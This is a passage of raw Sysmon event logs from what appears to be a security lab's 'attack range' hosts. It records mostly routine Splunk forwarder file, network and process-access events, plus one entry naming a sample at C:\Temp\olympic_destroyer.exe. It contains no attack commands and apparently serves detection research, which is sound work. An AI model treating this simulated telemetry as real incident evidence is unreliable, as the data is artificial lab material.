Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B757BD424E46B1E14CFFC34AD0D05C5C,SHA256=8F705412175DB000501EE6EE8CE850C059D026E30A842F55EBC4B26A95C7667B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:10.401{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BDC6DB6EBD3AC6CAE484DCF8321189B,SHA256=C1FA126AAE60F035A6994D91B90F948B86170DF1219996D42E0B1F19F3623424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:10.404{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=1C9297D7AC2FF5571365D6FE2C8F489F,SHA256=D685A9A3C8B250CC0AA389C150465E7E6E13180C93C88A88F15BE1B16006BE2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:11.432{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCE0214C472E0001FBA4D0F6040FDC4,SHA256=0CD5CD1C063B8B8588B74875E42E6055639F91EEF0565D6E9D974641AEEAD87A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:12.589{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D564B9A4B0E1CCCECCA7229ECE438B,SHA256=996130FD93DA10DC6B90CA5AF6607BE3264F1A1F759571070E2F35257ED16F47,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:09.571{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49388-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:12.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB5A3AFCF10A5D4D4140992D51FF38A1,SHA256=F3ACBFD53E21F531C75AE06ECE22B2B3275214E836F1D5D693F41FF1163BEDDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:13.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8466A0085F92C5F4C0F13B835114D0A8,SHA256=4DA0363F682626A6826B059E2A9DB6F7EE1619F753B944CE624EB25ED051860C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:13.035{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DBDB6E584366B2DC5EB086A6516DBD3,SHA256=36AD04FD8754BDACDE92F5647C597810A8317C201E097B9F8B864239204A94EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:14.620{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=271116FEFCAF0867A3D4429F20F42C98,SHA256=A8D6CF5E003FA969282A238F9EA421D9FE239B257189C77AA5EABA40914C93D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:14.065{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6951E08B65EFDE9C23C975DAF686BC3,SHA256=B9DE1E3363B5116DAE2E12A6A3C9FE72D2C21CF2607477A034D7A2E29336DDBA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:11.602{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51605-false10.0.1.12-8000- 23542300x8000000000000000220778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:15.620{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA2F63A07933FDB92D4ABA8625D46394,SHA256=F8044429DDAB7429E21E28C70CDE7E9BB236B5AAE7E6A75BAE8FC90F69337FBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:15.101{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9836A10C9D9F6E59F1BA7A5E3612FB4,SHA256=2BE9926D0E6823B619BFCF2375FAB9EA2AE1EA8782CA1E4BACDD4008657576A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:16.651{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5FC8E19368BD30FB3711A7D908D4C6A,SHA256=7FE355EAAE2BB6FEA44CE56D7AA1169FBB01BBD95C709A1A740E5BFA3E1F1411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:16.118{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FA8DDD707400FAFAA72F70E1BD7196,SHA256=84481E40D4C22017543EAB2984712C569DA7AD55446018B0D8B0E7ED12CB0152,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:17.682{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=610ED2077DBB92158A127C0DCEAC6499,SHA256=B2FB9F08A3AD34E6740D09954F90F78B89D88F4AC7F1B3A93857B0B7388119F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:15.522{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49389-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:17.133{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C922C393F643BD448CD448BE142E8827,SHA256=33F84975F96C80F49B3D68C6EAFEDD2C7496DBCA8A3E265F3E413CC2B08385D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:18.917{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=592DCFB75A7B3DFDF866696C5147A6B1,SHA256=51E30FE7FC695D0665C34529ABBA830A3581871FD9EE28A3DAC91C82A01F88D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:18.144{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B1F8941D49027F5F815BF803874A39D,SHA256=A313F7F0BDC3BB447E341CFC12BDDCFCD271C3D85FE8ED7D0572E92961CB6EB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:19.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0675328E12A86500315E6E9E9DBE7DDD,SHA256=0D4616CE107F59864A7E1C2D40F38BD0B53FEA3FA23F9BFA6BF270E44C261F09,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:16.633{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51606-false10.0.1.12-8000- 10341000x8000000000000000296854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.943{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16CF-6216-0F07-000000003802}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.941{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.941{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.941{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.941{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.940{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-16CF-6216-0F07-000000003802}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.939{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16CF-6216-0F07-000000003802}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.938{C8EA50B7-16CF-6216-0F07-000000003802}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.838{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.729{C8EA50B7-16CF-6216-0E07-000000003802}56765288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.308{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16CF-6216-0E07-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.308{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.308{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.308{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:19.308{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 